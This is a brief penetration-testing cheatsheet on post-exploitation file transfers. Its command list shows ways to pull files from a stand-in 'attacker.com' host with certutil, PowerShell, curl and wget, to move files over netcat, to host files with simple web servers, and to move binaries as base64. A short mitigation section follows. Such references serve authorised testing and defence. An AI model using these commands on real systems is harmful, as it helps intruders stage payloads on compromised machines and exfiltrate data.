File Transfers
File Transfers cheatsheet — File transfer techniques for post-exploitation.
Overview
File Transfers are a critical post-exploitation skill that enables moving tools, payloads, and exfiltrated data between compromised systems and attacker-controlled infrastructure.
Proficiency in multiple file transfer techniques ensures operational flexibility when dealing with restrictive egress filtering or limited tool availability on target systems.
Category: File Transfers — File transfer techniques for post-exploitation.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting File Transfers:
python3 -m http.server 80python2 -m SimpleHTTPServer 80php -S 0.0.0.0:80ruby -run -ehttpd . -p 80nc -lvnp 4444 < file.txt (sender)nc target 4444 > file.txt (receiver)certutil -urlcache -f http://attacker.com/file.exe file.exepowershell -c Invoke-WebRequest -Uri http://attacker.com/file.exe -OutFile file.exeiwr -Uri http://attacker.com/file.exe -OutFile file.execurl -O http://attacker.com/file.exewget http://attacker.com/file.exebase64 < file (encode on target)echo <base64> | base64 -d > file (decode on attacker)Tools & Techniques
Recommended tools for File Transfers:
- Python HTTP server: quick file hosting
- PHP built-in server: PHP-based file hosting
- Netcat: raw file transfer over TCP
- PowerShell Invoke-WebRequest (iwr): Windows download
- Certutil: Windows utility for file download
- Curl/Wget: Linux file download
- Base64 encoding: transfer binary files via text channels
- SMB: copy file from network share
Prevention & Mitigation
Security recommendations to prevent File Transfers:
- Implement strict egress filtering on outbound ports
- Use network proxies with content inspection
- Monitor large outbound data transfers
- Implement DLP (Data Loss Prevention) solutions
- Restrict PowerShell execution policy and command-line tools
- Enable Windows Defender/AV real-time scanning
References
Additional resources: